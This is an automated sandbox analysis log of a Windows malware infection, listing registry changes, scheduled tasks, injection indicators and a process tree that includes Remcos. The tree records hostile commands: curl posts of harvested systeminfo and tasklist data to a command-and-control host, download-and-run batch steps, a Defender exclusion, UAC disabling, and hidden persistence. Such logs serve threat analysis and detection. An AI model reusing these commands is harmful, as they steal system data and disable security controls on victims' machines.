| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\prnfldr.dll,-8036 = "Printers" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\9000Z5FCBIE3" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpF027.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpF027.tmp.bat
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\XTR9HDBSJMYU" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
